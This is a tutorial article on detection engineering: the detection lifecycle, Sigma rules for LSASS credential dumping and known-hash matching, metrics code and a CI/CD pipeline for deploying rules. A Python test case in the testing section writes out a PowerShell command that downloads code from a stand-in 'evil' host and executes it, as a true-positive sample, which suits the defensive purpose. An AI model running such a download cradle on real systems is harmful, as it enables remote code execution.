01 - Detection Engineering: from Script to Pipeline to Discipline
In an ever-evolving threat landscape, the ability to detect malicious activity before it causes significant damage represents the true differentiator between a resilient organization and a vulnerable one. For decades, threat detection was entrusted to ad-hoc rules, antivirus signatures, and individual SOC analysts' intuition. Today, this artisanal approach is no longer sustainable: the volume of logs, the complexity of cloud-native infrastructure, and the sophistication of attackers demand an engineering-driven, systematic approach.
This is how Detection Engineering was born: a discipline that applies software engineering principles to the process of creating, testing, deploying, and maintaining detection rules. It is no longer about writing isolated queries in a SIEM, but about building automated pipelines, versioning detections as code, testing them with simulated data, and measuring them with objective metrics.
What You Will Learn in This Article
- What Detection Engineering is and why it has become a standalone discipline
- The evolution from ad-hoc scripts to CI/CD pipelines for detections
- The complete detection lifecycle: hypothesis, development, testing, deployment, tuning
- Main detection types: signature-based, behavioral, anomaly-based
- Quality metrics: True Positive Rate, False Positive Rate, MTTD, MTTR
- The SIEM/SOAR ecosystem and fundamental data sources
- The Detection-as-Code concept and CI/CD pipelines for security rules
- Practical examples with Sigma rules, Python scripts, and YAML configurations
What is Detection Engineering
Detection Engineering is the systematic process of designing, developing, testing, and maintaining logic that identifies malicious activity within an organization's telemetry. This telemetry includes logs from endpoints, cloud infrastructure, identity providers, web applications, network systems, and much more.
Unlike the traditional approach, where a SOC analyst would write a query in the SIEM in response to a specific incident, Detection Engineering adopts a structured workflow resembling modern software development: code versioning, code review, automated testing, continuous deployment, and production performance monitoring.
"Detection Engineering is to SOC what Software Engineering is to coding: it transforms an ad-hoc, reactive activity into a systematic, measurable, and continuously improving discipline."
- SANS Institute, 2025 Detection Engineering Survey
The Three Pillars of Detection Engineering
The discipline is built on three interconnected pillars that define its maturity:
- Threat Intelligence - Understanding who the adversaries are, what techniques they use (MITRE ATT&CK), and which organizational assets are at risk. Without a deep understanding of threats, detections will be generic and ineffective.
- Data Engineering - Ensuring that necessary logs are collected, normalized, and available for analysis. A perfect detection is useless if the data it operates on is missing or of poor quality.
- Software Engineering - Applying software development best practices: version control, testing, CI/CD, documentation, metrics. Detections must be treated as production code.
The Evolution: from Ad-Hoc Scripts to an Engineering Discipline
The journey that led to modern Detection Engineering can be divided into four distinct phases, each characterized by increasing levels of maturity and automation.
Phase 1: The Signature Era (1990-2005)
The earliest forms of detection relied on static signatures: known malware patterns, hashes of malicious files, specific strings in network payloads. Every antivirus and IDS (Intrusion Detection System) maintained a signature database that was periodically updated. The approach worked reasonably well with known threats but was completely blind to new variants or customized attacks.
Phase 2: The SIEM Script Era (2005-2015)
With the spread of the first SIEMs (Security Information and Event Management), analysts began writing custom queries and correlations. Each analyst had their own approach, their own scripts, their own naming conventions. Rules were created directly in the SIEM's web interface, with no versioning, no testing, no standardized documentation. When an analyst left the organization, their detections often became incomprehensible to successors.
Phase 3: The Birth of Detection Engineering (2015-2022)
Between 2015 and 2022, the security community began recognizing the need for a more structured approach. Standard formats like Sigma (2017) emerged for detection rules, the MITRE ATT&CK framework became the universal reference for mapping adversary techniques, and the first dedicated Detection Engineering teams appeared in more mature organizations.
Phase 4: Detection-as-Code and CI/CD Pipelines (2022-present)
Today, the most advanced organizations treat detections exactly like software code. Rules are written in declarative formats (Sigma, YAML), versioned in Git repositories, automatically tested with simulated data, deployed via CI/CD pipelines, and monitored with dedicated dashboards. According to the SANS 2025 Detection Engineering Survey, 60% of organizations maintain dedicated Detection Engineering teams, with 70% of enterprises with over 5,000 employees having already established structured teams.
| Phase | Period | Approach | Tools | Limitations |
|---|---|---|---|---|
| Static Signatures | 1990-2005 | Pattern matching on known signatures | Antivirus, IDS (Snort) | Blind to zero-days, signature update latency |
| SIEM Scripts | 2005-2015 | Ad-hoc queries in SIEM | Splunk, ArcSight, QRadar | Unversioned, untested, knowledge siloed |
| Detection Engineering | 2015-2022 | Structured workflow with standards | Sigma, ATT&CK, ELK | Still many manual processes |
| Detection-as-Code | 2022-present | CI/CD pipelines, everything versioned | Git, CI/CD, Sigma, SOAR | Requires organizational maturity |
The Detection Lifecycle
Every detection follows a well-defined lifecycle that ensures quality, effectiveness, and long-term maintainability. The cycle consists of six fundamental phases, each with specific deliverables and quality criteria.
1. Hypothesis
Everything starts with a threat hypothesis. The analyst or detection engineer identifies a specific attack technique (for example, "An attacker might use PowerShell to download and execute malicious payloads") and formulates a hypothesis about how this activity would manifest in available logs. Sources for hypotheses include:
- Threat Intelligence - Reports on active campaigns, observed TTPs
- MITRE ATT&CK - Techniques mapped to specific tactics
- Incident post-mortems - Lessons learned from previous incidents
- Red Team findings - Results from penetration tests and purple teaming
- Gap analysis - ATT&CK techniques without detection coverage
2. Development
With the hypothesis defined, the detection engineer writes the detection rule. This involves choosing the format (Sigma, native SIEM query, Python script), defining the required log sources, the selection and filtering logic, and documenting metadata (author, severity, ATT&CK mapping, known false positives).
3. Testing and Validation
Before deployment, the detection must be validated against real and simulated data. Testing includes: true positive testing (does the rule detect the simulated attack?), false positive testing (does the rule generate alerts on legitimate activity?), and performance testing (is the rule sufficiently performant on production log volumes?).
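To make this concrete, here is a minimal sketch of such a test harness in Python. The detection predicate, the event fields (Image, CommandLine), and the test cases are illustrative placeholders, standing in for a compiled Sigma rule and real log records:

```python
def matches_powershell_download(event: dict) -> bool:
    """Toy detection predicate: PowerShell launching a download cradle.
    Stands in for a compiled Sigma rule; field names follow Sysmon."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "").lower()
    return image.endswith("\\powershell.exe") and (
        "downloadstring" in cmd or "invoke-webrequest" in cmd
    )

def run_test_cases(detect, cases):
    """Run each case through the predicate and collect mismatches.
    Each case pairs a sample event with the verdict we expect."""
    failures = []
    for case in cases:
        if detect(case["event"]) != case["expected"]:
            failures.append(case["name"])
    return failures

cases = [
    # True positive: the simulated attack must trigger the rule
    {"name": "tp_download_cradle", "expected": True,
     "event": {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               "CommandLine": "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://evil/a')"}},
    # False positive: legitimate admin activity must stay silent
    {"name": "fp_admin_script", "expected": False,
     "event": {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               "CommandLine": "powershell -File C:\\scripts\\backup.ps1"}},
]

failures = run_test_cases(matches_powershell_download, cases)
print("Failures:", failures)  # an empty list means the rule behaves as expected
```

In a real pipeline, the cases would be loaded from a tests/ directory and the predicate compiled from the Sigma rule under test.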
4. Deployment
Deployment occurs through automated pipelines that convert the rule to the target SIEM's native format, distribute it to the production environment, and verify its correct operation. In mature environments, this process is fully automated via CI/CD.
5. Monitoring and Metrics
Once in production, the detection is constantly monitored. Key metrics include the volume of generated alerts, the true/false positive ratio, mean time to detect (MTTD), and the impact on SOC analyst workload.
6. Tuning and Maintenance
Based on data collected in production, the detection is continuously refined. Tuning may include adding exceptions for recurring false positives, expanding the logic to cover technique variants, or deprecating the rule if it is no longer relevant.
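As a sketch of how tuning decisions can be data-driven, the snippet below flags rules whose analyst-assigned false-positive share exceeds a threshold. The disposition labels, threshold, and minimum-volume cutoff are assumptions for illustration:

```python
from collections import Counter

def tuning_candidates(alerts, fp_threshold=0.25, min_alerts=20):
    """Flag rules whose false-positive share exceeds the threshold.
    `alerts` is a list of (rule_id, disposition) pairs, where the
    disposition ('true_positive' / 'false_positive') is set by the
    analyst who triaged the alert."""
    totals, fps = Counter(), Counter()
    for rule_id, disposition in alerts:
        totals[rule_id] += 1
        if disposition == "false_positive":
            fps[rule_id] += 1
    flagged = {}
    for rule_id, total in totals.items():
        if total >= min_alerts:  # skip rules with too little data
            rate = fps[rule_id] / total
            if rate > fp_threshold:
                flagged[rule_id] = round(rate, 2)
    return flagged

alerts = ([("SIGMA-010", "false_positive")] * 12
          + [("SIGMA-010", "true_positive")] * 8
          + [("SIGMA-011", "true_positive")] * 25)
print(tuning_candidates(alerts))  # {'SIGMA-010': 0.6} — well above the 25% target
```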
Best Practice: Purple Teaming
Purple teaming significantly accelerates the detection lifecycle feedback loop. By combining the Red Team's offensive skills with the Blue Team's defensive capabilities, it is possible to simulate real attack techniques and validate detections in real time, reducing the time from hypothesis to validated detection from weeks to hours.
Detection Types: from IOC to Behavior
Detections can be classified based on the detection logic used. Each type has specific advantages and limitations, and a mature detection program combines all of them in a layered approach.
1. Signature-Based Detection
Signature-based detection looks for exact patterns in data: known file hashes, specific command strings, known malicious IP addresses or domains (IOC - Indicators of Compromise). It is the simplest and fastest type, with a very low false positive rate, but completely ineffective against new threats or variants.
title: Emotet Loader Hash Detection
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
status: stable
description: Detects known Emotet loader by file hash
author: Detection Engineering Team
date: 2025/10/15
references:
    - https://attack.mitre.org/software/S0367/
logsource:
    category: file_event
    product: windows
detection:
    selection:
        Hashes|contains:
            # Placeholder values (hashes of empty input) - substitute real IOCs
            - 'SHA256=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
            - 'SHA256=a7ffc6f8bf1ed76651c14756a061d662f580ff4de43b49fa82d80a4b80f8434a'
            - 'MD5=d41d8cd98f00b204e9800998ecf8427e'
    condition: selection
falsepositives:
    - Unlikely, known malicious hashes
level: critical
tags:
    - attack.execution
    - attack.t1204.002
2. Behavioral Detection
Behavioral detections look for sequences of actions or behavior patterns indicating suspicious activity, regardless of specific IOCs. For example, instead of searching for a specific Mimikatz hash, a behavioral detection might look for any process accessing LSASS memory to extract credentials. This approach is much more resistant to evasion, because attackers can change their tools but can hardly change the underlying technique.
title: Suspicious LSASS Process Access - Credential Dumping
id: b2c3d4e5-f6a7-8901-bcde-f12345678901
status: experimental
description: |
    Detects process access to LSASS memory, a common technique
    for credential dumping (T1003.001). Focuses on behavior
    rather than specific tool signatures.
author: Federico Calo
date: 2025/11/20
references:
    - https://attack.mitre.org/techniques/T1003/001/
logsource:
    category: process_access
    product: windows
detection:
    selection:
        TargetImage|endswith: '\lsass.exe'
        GrantedAccess|contains:
            - '0x1010'    # PROCESS_QUERY_LIMITED_INFORMATION + PROCESS_VM_READ
            - '0x1038'    # Read memory access
            - '0x1FFFFF'  # PROCESS_ALL_ACCESS
    filter_legitimate:
        SourceImage|endswith:
            - '\MsMpEng.exe'    # Windows Defender
            - '\csrss.exe'      # Client Server Runtime
            - '\wmiprvse.exe'   # WMI Provider
            - '\svchost.exe'    # Service Host
    filter_system:
        SourceUser|contains: 'SYSTEM'
        SourceImage|startswith: 'C:\Windows\System32\'
    condition: selection and not filter_legitimate and not filter_system
falsepositives:
    - Legitimate security tools performing memory scanning
    - EDR solutions with high-privilege access
level: high
tags:
    - attack.credential_access
    - attack.t1003.001
3. Anomaly-Based Detection
Anomaly-based detections establish a baseline of normalcy and flag significant deviations. For example, if a user typically logs in from Italy during business hours, a login from China at 3 AM would be an anomaly. This approach can detect completely unknown threats (zero-day), but tends to generate more false positives, especially in dynamic environments.
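A minimal Python sketch of this idea, using a z-score over a user's historical login hours. The baseline values and the deviation threshold are illustrative, not production-calibrated:

```python
import statistics

def is_anomalous(value: float, baseline: list, z_threshold: float = 3.0) -> bool:
    """Flag a value that deviates more than z_threshold standard
    deviations from the historical baseline."""
    mean = statistics.mean(baseline)
    stdev = statistics.stdev(baseline)
    if stdev == 0:
        return value != mean  # degenerate baseline: any deviation is anomalous
    return abs(value - mean) / stdev > z_threshold

# Baseline: a user's typical login hours (morning logins, business hours)
login_hours = [9, 9, 10, 8, 9, 11, 10, 9, 10, 10, 9, 10]

print(is_anomalous(3, login_hours))   # True  — a 03:00 login is far off baseline
print(is_anomalous(10, login_hours))  # False — a 10:00 login is normal
```

In production, the baseline would be rebuilt continuously per user (or per entity), which is exactly where the tuning burden of anomaly-based detection comes from.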
4. Threat Hunting
Threat Hunting is a proactive, hypothesis-driven process where analysts actively search for threats that may have evaded automated detections. Unlike automated detections, threat hunting is exploratory and often produces new detections that are then codified and automated.
| Detection Type | Precision | Zero-Day Coverage | False Positives | Maintenance | Example |
|---|---|---|---|---|---|
| Signature-Based | Very high | None | Very low | High (IOC updates) | File hashes, malicious IPs |
| Behavioral | High | Good | Moderate | Medium | LSASS access, lateral movement |
| Anomaly-Based | Variable | Excellent | High | High (baseline tuning) | Anomalous login, unusual traffic |
| Threat Hunting | Very high | Excellent | Minimal (manual) | High (requires analysts) | Exploratory analysis, hypotheses |
Detection Quality Metrics
A detection is only as useful as it is measurable. Quality metrics make it possible to evaluate the effectiveness of detection rules, guide the tuning process, and justify investment in the Detection Engineering program.
Core Operational Metrics
| Metric | Description | Target | How to Improve |
|---|---|---|---|
| MTTD (Mean Time to Detect) | Average time from malicious activity to alert generation | < 4 hours (top teams: < 30 min) | Better log coverage, real-time detection |
| MTTR (Mean Time to Respond) | Average time from detection to containment/resolution | < 4 hours | SOAR automation, defined playbooks |
| True Positive Rate (TPR) | Percentage of alerts that correspond to real threats | > 80% for critical, > 60% for high | Continuous tuning, advanced filtering |
| False Positive Rate (FPR) | Percentage of alerts generated for legitimate activity | < 25% for critical | Whitelists, enriched context, correlation |
| False Negative Rate (FNR) | Percentage of real threats not detected | < 1% | Purple teaming, threat hunting |
| ATT&CK Coverage | Percentage of MITRE ATT&CK techniques covered by at least one detection | > 70% of relevant techniques | Regular gap analysis, prioritization |
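The ATT&CK coverage metric from the table can be computed mechanically from rule tags. Below is a small Python sketch; the technique IDs are real ATT&CK identifiers, but the rule set and the list of "relevant" techniques are illustrative:

```python
def attack_coverage(rule_tags: list, relevant_techniques: set) -> float:
    """Percentage of relevant ATT&CK techniques covered by at least
    one detection rule. `rule_tags` holds one set of technique tags
    per rule, as found in each rule's `tags` field."""
    covered = set().union(*rule_tags) & relevant_techniques if rule_tags else set()
    return round(100 * len(covered) / len(relevant_techniques), 1)

rules = [
    {"t1003.001", "t1003.002"},   # credential dumping variants
    {"t1059.001"},                # PowerShell execution
    {"t1021.001"},                # RDP lateral movement
]
relevant = {"t1003.001", "t1003.002", "t1059.001",
            "t1021.001", "t1566.001", "t1053.005"}

print(f"ATT&CK coverage: {attack_coverage(rules, relevant)}%")  # 66.7%
```

The uncovered techniques (here phishing attachments and scheduled tasks) feed directly back into the hypothesis phase as gap-analysis input.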
Calculating the Detection Score
A practical approach to evaluating the overall quality of a detection program is the Detection Maturity Score, which combines several metrics into a normalized score. Here is a Python calculation example:
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class DetectionMetrics:
    """Immutable snapshot of detection performance metrics."""
    rule_id: str
    true_positives: int
    false_positives: int
    false_negatives: int
    total_alerts: int
    avg_detection_time_minutes: float  # MTTD
    avg_response_time_minutes: float   # MTTR

    @property
    def precision(self) -> float:
        """TP / (TP + FP) - How many alerts are real threats."""
        denominator = self.true_positives + self.false_positives
        return self.true_positives / denominator if denominator > 0 else 0.0

    @property
    def recall(self) -> float:
        """TP / (TP + FN) - How many real threats are caught."""
        denominator = self.true_positives + self.false_negatives
        return self.true_positives / denominator if denominator > 0 else 0.0

    @property
    def f1_score(self) -> float:
        """Harmonic mean of precision and recall."""
        p, r = self.precision, self.recall
        return 2 * (p * r) / (p + r) if (p + r) > 0 else 0.0


def calculate_maturity_score(metrics_list: List[DetectionMetrics]) -> dict:
    """Calculate overall detection program maturity score.

    Returns a dict with the aggregated metrics.
    """
    if not metrics_list:
        return {"score": 0, "grade": "F", "details": {}}

    avg_precision = sum(m.precision for m in metrics_list) / len(metrics_list)
    avg_recall = sum(m.recall for m in metrics_list) / len(metrics_list)
    avg_f1 = sum(m.f1_score for m in metrics_list) / len(metrics_list)
    avg_mttd = sum(m.avg_detection_time_minutes for m in metrics_list) / len(metrics_list)
    avg_mttr = sum(m.avg_response_time_minutes for m in metrics_list) / len(metrics_list)

    # Weighted maturity score: each component is already scaled to its
    # weight, so the components sum directly to a 0-100 score
    precision_score = avg_precision * 25  # 25% weight
    recall_score = avg_recall * 25        # 25% weight
    f1_component = avg_f1 * 20            # 20% weight
    mttd_score = max(0, (240 - avg_mttd) / 240) * 15  # 15% weight (240min = 4h target)
    mttr_score = max(0, (240 - avg_mttr) / 240) * 15  # 15% weight

    total_score = (precision_score + recall_score + f1_component
                   + mttd_score + mttr_score)

    grade_thresholds = [(90, "A"), (80, "B"), (70, "C"), (60, "D")]
    grade = next(
        (g for threshold, g in grade_thresholds if total_score >= threshold),
        "F"
    )

    return {
        "score": round(total_score, 1),
        "grade": grade,
        "details": {
            "avg_precision": round(avg_precision, 3),
            "avg_recall": round(avg_recall, 3),
            "avg_f1": round(avg_f1, 3),
            "avg_mttd_minutes": round(avg_mttd, 1),
            "avg_mttr_minutes": round(avg_mttr, 1),
            "total_rules_evaluated": len(metrics_list),
        },
    }


# Usage example
sample_metrics = [
    DetectionMetrics("SIGMA-001", 45, 5, 2, 50, 15.0, 35.0),
    DetectionMetrics("SIGMA-002", 120, 30, 8, 150, 8.5, 22.0),
    DetectionMetrics("SIGMA-003", 200, 15, 5, 215, 3.2, 12.0),
]

result = calculate_maturity_score(sample_metrics)
print(f"Detection Maturity Score: {result['score']} ({result['grade']})")
print(f"Details: {result['details']}")
Warning: Vanity Metrics
Avoid measuring your detection program's success by the total number of rules or the number of alerts generated. These are vanity metrics that can mask serious problems. An organization with 50 high-fidelity detections is far more secure than one with 5,000 rules generating thousands of false positives and causing alert fatigue in analysts.
The SIEM/SOAR Ecosystem
The SIEM (Security Information and Event Management) is the heart of Detection Engineering infrastructure. It is the platform that collects, normalizes, correlates, and analyzes logs from all organizational sources. SOAR (Security Orchestration, Automation and Response) complements the SIEM by automating responses to alerts through predefined playbooks.
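As a sketch of the SOAR side, the snippet below dispatches response actions based on alert attributes. The action names are placeholders for real integrations (EDR host isolation, IdP session revocation, ticketing), not an actual SOAR API:

```python
def run_playbook(alert: dict) -> list:
    """Dispatch a minimal response playbook based on alert attributes.
    Each string stands in for a call to an external integration."""
    actions = ["create_ticket"]  # every alert is tracked
    if alert["category"] == "credential_access":
        actions.append("revoke_user_sessions")  # limit blast radius of stolen creds
    if alert["severity"] in ("high", "critical"):
        actions.append("isolate_host")          # contain via EDR
    if alert["severity"] == "critical":
        actions.append("page_oncall_analyst")   # humans in the loop for critical
    return actions

alert = {"rule_id": "SIGMA-002", "category": "credential_access", "severity": "critical"}
print(run_playbook(alert))
# ['create_ticket', 'revoke_user_sessions', 'isolate_host', 'page_oncall_analyst']
```

Real SOAR playbooks add approval gates, error handling, and enrichment steps, but the core pattern is the same: alert attributes in, ordered actions out.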
Overview of Major SIEM Platforms
| Platform | Type | Query Language | Strengths | Ideal Use Case |
|---|---|---|---|---|
| Splunk Enterprise | On-prem / Cloud | SPL | Maturity, app ecosystem, flexibility | Complex enterprises, mature SOCs |
| Elastic SIEM | Open Source / Cloud | KQL / EQL / ES\|QL | Open source, scalability, cost | Budget-constrained teams, cloud-native |
| Microsoft Sentinel | Cloud (Azure) | KQL | Azure/M365 integration, built-in AI | Microsoft-centric organizations |
| Google SecOps (Chronicle) | Cloud (GCP) | YARA-L | Unlimited retention, speed | Large data volumes, GCP |
| CrowdStrike Falcon LogScale | Cloud | LogScale Query | Fast ingestion, compression | CrowdStrike organizations |
| Sumo Logic | Cloud | Sumo Logic Query | SaaS-native, ease of use | Cloud-first, SaaS-heavy |
Fundamental Data Sources
Detection quality depends directly on the quality and completeness of available data. Here are the fundamental data sources for an effective detection program:
- Endpoint Telemetry - Process logs, file system events, registry changes, network connections. Sources: EDR (CrowdStrike, SentinelOne, Microsoft Defender), Sysmon
- Network Telemetry - NetFlow, DNS queries, HTTP/TLS metadata, selective PCAPs. Sources: firewalls, IDS/IPS, proxies, DNS resolvers
- Identity & Access - Authentication events, privilege escalation, group membership changes. Sources: Active Directory, Entra ID, Okta, CyberArk
- Cloud Audit Logs - API calls, configuration changes, resource creation. Sources: AWS CloudTrail, Azure Activity Log, GCP Audit Logs
- Application Logs - Web server access logs, application errors, WAF events. Sources: Nginx, Apache, CloudFront, custom applications
- Email Security - Phishing attempts, malicious attachments, BEC detection. Sources: Microsoft Defender for O365, Proofpoint, Mimecast
Data Normalization: the Invisible Foundation
Without data normalization, detections are fragile and non-portable.
Every SIEM and every source uses different formats for the same concepts: a "failed login"
may appear as EventID 4625 in Windows, sshd: Failed password
in Linux, or {"eventType": "user.session.start", "outcome": "FAILURE"}
in Okta. Adopting a normalization schema like ECS (Elastic Common Schema),
OCSF (Open Cybersecurity Schema Framework), or Sigma's data model allows
writing detections once and applying them across any source.
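A minimal Python sketch of such normalization, mapping the three "failed login" shapes mentioned above onto a common ECS-like record. The output field names follow ECS conventions, and the input shapes are simplified for illustration:

```python
from typing import Optional

def normalize_failed_login(raw: dict) -> Optional[dict]:
    """Map vendor-specific failed-login events onto a minimal
    ECS-like shape. Returns None for events we don't recognize."""
    if raw.get("EventID") == 4625:  # Windows Security log
        return {"event.category": "authentication", "event.outcome": "failure",
                "user.name": raw.get("TargetUserName"), "observer.product": "windows"}
    if "Failed password" in raw.get("message", ""):  # Linux sshd syslog
        return {"event.category": "authentication", "event.outcome": "failure",
                "user.name": raw.get("user"), "observer.product": "sshd"}
    if raw.get("eventType", "").startswith("user.session") and raw.get("outcome") == "FAILURE":
        return {"event.category": "authentication", "event.outcome": "failure",
                "user.name": raw.get("actor"), "observer.product": "okta"}  # Okta
    return None

events = [
    {"EventID": 4625, "TargetUserName": "alice"},
    {"message": "sshd: Failed password for bob from 10.0.0.5", "user": "bob"},
    {"eventType": "user.session.start", "outcome": "FAILURE", "actor": "carol"},
]
normalized = [normalize_failed_login(e) for e in events]
print(all(n and n["event.outcome"] == "failure" for n in normalized))  # True
```

A single detection on event.category == "authentication" and event.outcome == "failure" now covers all three sources; this is exactly what ECS, OCSF, and the Sigma data model standardize at scale.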
Detection-as-Code: the Modern Paradigm
Detection-as-Code (DaC) is the approach that applies software development practices to detection rule management. Instead of creating and modifying rules through the SIEM's graphical interface, detections are written as code, versioned in Git repositories, subjected to code review via pull requests, automatically tested, and deployed through CI/CD pipelines.
Detection-as-Code Advantages
Compared to Traditional Approach
- Versioning - Every change is tracked in Git, with rollback capability
- Code Review - Detections undergo peer review before deployment
- Automated Testing - Automatic validation with positive and negative data
- Reproducibility - The entire detection state is reconstructable from the repository
Operational Benefits
- Speed - Detections go to production in minutes, not days
- Consistency - Quality standards applied uniformly
- Audit Trail - Complete traceability for compliance
- Collaboration - Multiple teams can contribute to the same repository
Detection-as-Code Repository Structure
detections/
    rules/
        credential_access/
            lsass_memory_access.yml
            brute_force_login.yml
            kerberoasting.yml
        execution/
            powershell_encoded_command.yml
            suspicious_wmi_execution.yml
        lateral_movement/
            psexec_usage.yml
            rdp_from_unusual_source.yml
        persistence/
            scheduled_task_creation.yml
            registry_run_key.yml
    tests/
        credential_access/
            lsass_memory_access_test.json
            brute_force_login_test.json
        execution/
            powershell_encoded_command_test.json
    config/
        sigma_config.yml
        siem_mappings.yml
        exclusions.yml
    pipelines/
        ci.yml
        cd.yml
    docs/
        CONTRIBUTING.md
        STYLE_GUIDE.md
        REVIEW_CHECKLIST.md
    README.md
CI/CD Pipeline for Detections
The CI/CD pipeline for detections automates the entire process from commit to production. Here is a configuration example for GitHub Actions:
name: Detection CI/CD Pipeline

on:
  pull_request:
    paths: ['rules/**', 'tests/**']
  push:
    branches: [main]
    paths: ['rules/**']

jobs:
  validate:
    name: Validate Sigma Rules
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Install sigma-cli
        run: pip install sigma-cli pySigma-backend-splunk pySigma-backend-elasticsearch
      - name: Lint Sigma Rules
        run: |
          sigma check rules/ --validation-config config/sigma_config.yml
          echo "All rules pass validation"
      - name: Verify ATT&CK Mapping
        run: |
          python scripts/verify_attack_tags.py rules/
          echo "All rules have valid ATT&CK mappings"

  test:
    name: Test Detection Logic
    needs: validate
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run True Positive Tests
        run: |
          python scripts/run_tests.py \
            --rules-dir rules/ \
            --tests-dir tests/ \
            --test-type true_positive
      - name: Run False Positive Tests
        run: |
          python scripts/run_tests.py \
            --rules-dir rules/ \
            --tests-dir tests/ \
            --test-type false_positive
      - name: Generate Coverage Report
        run: python scripts/coverage_report.py --output reports/coverage.json

  deploy:
    name: Deploy to SIEM
    needs: test
    if: github.ref == 'refs/heads/main'
    runs-on: ubuntu-latest
    environment: production
    steps:
      - uses: actions/checkout@v4
      - name: Convert Sigma to Splunk SPL
        run: |
          sigma convert \
            --target splunk \
            --pipeline splunk_windows \
            rules/ \
            --output converted/splunk/
      - name: Deploy to Splunk via API
        env:
          SPLUNK_TOKEN: ${{ secrets.SPLUNK_TOKEN }}
        run: python scripts/deploy_to_splunk.py --input converted/splunk/
The final deploy step is deliberately minimal: the token is injected from the repository's GitHub secrets, and the deployment script (here a hypothetical scripts/deploy_to_splunk.py, following the same scripts/ convention as the testing jobs) would typically call the Splunk REST API to create or update each saved search. The same pattern applies to any other SIEM with a rules API.